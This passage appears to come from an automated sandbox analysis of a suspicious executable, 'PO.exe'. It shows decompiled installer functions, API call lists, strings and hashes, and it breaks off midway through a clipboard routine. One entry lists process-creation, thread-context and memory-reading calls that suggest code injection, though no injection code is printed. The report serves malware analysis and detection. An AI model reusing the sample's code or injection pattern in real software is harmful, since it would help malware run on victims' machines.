                                            • Instruction ID: ec33d43fd80408aade94dae3ee73ef6b013523b640a64d09e49109c73568a182
                                            • Opcode Fuzzy Hash: c69edf1f60cf3f7593567da81f34f7c070dc7a2f222ebb339bb867568812a015
                                            • Instruction Fuzzy Hash: 87A10074D10219EFEF10CFE4C995BADBBB1BF08326F20845AE914BA2A0D7745A40DF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040555F(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E004054F7(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059BF("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                            0x004015d5
                                            0x004015dc
                                            0x004015e6
                                            0x004015e8
                                            0x004015ee
                                            0x004015f6
                                            0x004015fc
                                            0x004015fe
                                            0x00401601
                                            0x00401609
                                            0x00401616
                                            0x00401623
                                            0x00401623
                                            0x00401618
                                            0x00401619
                                            0x00401621
                                            0x00000000
                                            0x00000000
                                            0x00401621
                                            0x00401616
                                            0x00401626
                                            0x00401629
                                            0x0040162b
                                            0x0040162c
                                            0x004015ee
                                            0x00401633
                                            0x00401653
                                            0x004021e8
                                            0x00401635
                                            0x00401637
                                            0x00401642
                                            0x00401648
                                            0x00401648
                                            0x00402932
                                            0x0040293e

                                            APIs
                                              • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 0040556D
                                              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 3751793516-1943935188
                                            • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                            • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                            • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                            • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004056BF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                            0x004056c3
                                            0x004056c9
                                            0x004056ca
                                            0x004056ca
                                            0x004056cb
                                            0x004056d2
                                            0x004056dc
                                            0x004056e9
                                            0x004056ec
                                            0x004056f4
                                            0x00000000
                                            0x00000000
                                            0x004056f8
                                            0x00000000
                                            0x00000000
                                            0x004056fa
                                            0x00000000
                                            0x004056fa
                                            0x00000000

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 004056D2
                                            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\PO.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                            Strings
                                            • nsa, xrefs: 004056CB
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                            • API String ID: 1716503409-768089442
                                            • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                            • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                            • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                            • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02550034, Relevance: 6.6, APIs: 4, Instructions: 552processthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 02550373
                                            • GetThreadContext.KERNELBASE(?,00010007), ref: 02550396
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 025503BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.240226269.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThread
                                            • String ID:
                                            • API String ID: 2411489757-0
                                            • Opcode ID: 402f9b261368d08e1a6e663e2738fa91c32c0ed764268633f06e1433e76732e8
                                            • Instruction ID: f29162261c181c83eae33a831465f7c84b313d262bf999b676306aabf448b24b
                                            • Opcode Fuzzy Hash: 402f9b261368d08e1a6e663e2738fa91c32c0ed764268633f06e1433e76732e8
                                            • Instruction Fuzzy Hash: B3320731D50229EEEB60CBA4DC65FADBBB5BF48705F104496E918FA2E0D7705A80CF19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040136D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E0040136D(signed int _a4) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;
				void* _t28;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x7a2fb0;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags =  *(_t28 + 0xc);
					if( *(_t28 + 0xc) != 0) {
						 *0x7a276c =  *0x7a276c + _t13;
						_t14 =  *0x7a2754;
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}












                                            0x0040136e
                                            0x004013fb
                                            0x00401382
                                            0x00401384
                                            0x00401387
                                            0x00000000
                                            0x00000000
                                            0x00401389
                                            0x0040138a
                                            0x0040138f
                                            0x00401394
                                            0x00000000
                                            0x00401409
                                            0x00401396
                                            0x00401398
                                            0x004013a6
                                            0x004013ab
                                            0x004013ab
                                            0x004013ad
                                            0x004013b5
                                            0x004013b6
                                            0x004013b8
                                            0x004013ba
                                            0x004013ba
                                            0x004013af
                                            0x004013b1
                                            0x004013b2
                                            0x004013b2
                                            0x004013bc
                                            0x004013c1
                                            0x004013c3
                                            0x004013c9
                                            0x004013d2
                                            0x004013d7
                                            0x004013d7
                                            0x004013f5
                                            0x004013f5
                                            0x004013c1
                                            0x00000000

                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                            • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: 4@
                                            • API String ID: 3850602802-2385517874
                                            • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                            • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
                                            • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                            • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403116, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E00403116(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				E00405BFB(_t6);
				_t2 = E00405538(_t6);
				if(_t2 != 0) {
					E004054CC(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056BF("\"C:\\Users\\alfons\\Desktop\\PO.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                            0x00403117
                                            0x0040311d
                                            0x00403123
                                            0x0040312a
                                            0x0040312f
                                            0x00403137
                                            0x00403143
                                            0x00403149
                                            0x0040312d
                                            0x0040312d
                                            0x0040312d

                                            APIs
                                              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Char$Next$CreateDirectoryPrev
                                            • String ID: "C:\Users\user\Desktop\PO.exe" $C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 4115351271-4270557789
                                            • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                            • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
                                            • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                            • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405690, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00405690(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                            0x00405694
                                            0x004056a1
                                            0x004056b6
                                            0x004056bc

                                            APIs
                                            • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                            • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                            • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                            • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004030CD, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004030CD(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                            0x004030d1
                                            0x004030e4
                                            0x004030ec
                                            0x00000000
                                            0x004030f3
                                            0x00000000
                                            0x004030f5

                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                            • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                            • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                            • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004030FF, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004030FF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                                            0x0040310d
                                            0x00403113

                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                            • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                            • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                            • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004054F7, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004054F7(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                            0x004054f7
                                            0x0040550a
                                            0x0040550a
                                            0x0040550e
                                            0x00000000
                                            0x00000000
                                            0x00405501
                                            0x00405504
                                            0x00000000
                                            0x00405504
                                            0x00000000
                                            0x00405501
                                            0x00405510

                                            APIs
                                            • CharNextA.USER32(?,00405C4D,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405504
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharNext
                                            • String ID:
                                            • API String ID: 3213498283-0
                                            • Opcode ID: b411918ab1eb26758375c035e9adf1183577ea404a955402d598b5c9ffb07099
                                            • Instruction ID: 892fef8f78bee00eb476aaf619e1090be6f12fd30b71fe3201b25ceeba2b4cc3
                                            • Opcode Fuzzy Hash: b411918ab1eb26758375c035e9adf1183577ea404a955402d598b5c9ffb07099
                                            • Instruction Fuzzy Hash: B0C0807040C78177C5105760D9245677FE1AA91341F584896F0C563151D134B8509B3F
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00404EA0, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277windowclipboardmemoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				int _t93;
				int _t94;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x7a2764;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					if(_a8 != 0x111) {
						L16:
						if(_a8 != 0x404) {
							L24:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L19;
							} else {
								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t86;
								if(_t86 <= _t148) {
									L36:
									return 0;
								}
								_t88 = CreatePopupMenu();
								_push(0xffffffe1);
								_push(_t148);
								_t159 = _t88;
								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
								_t91 = _a16;
								if(_t91 != 0xffffffff) {
									_t149 = _t91;
									_t93 = _t91 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v24);
									_t149 = _v24.left;
									_t93 = _v24.top;
								}
								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
								_t161 = 1;
								if(_t94 == 1) {
									_v56 = _t148;
									_v44 = 0x79f580;
									_v40 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t100 = GlobalAlloc(0x42, _t161);
									_a4 = _t100;
									_t162 = GlobalLock(_t100);
									do {
										_v44 = _t162;
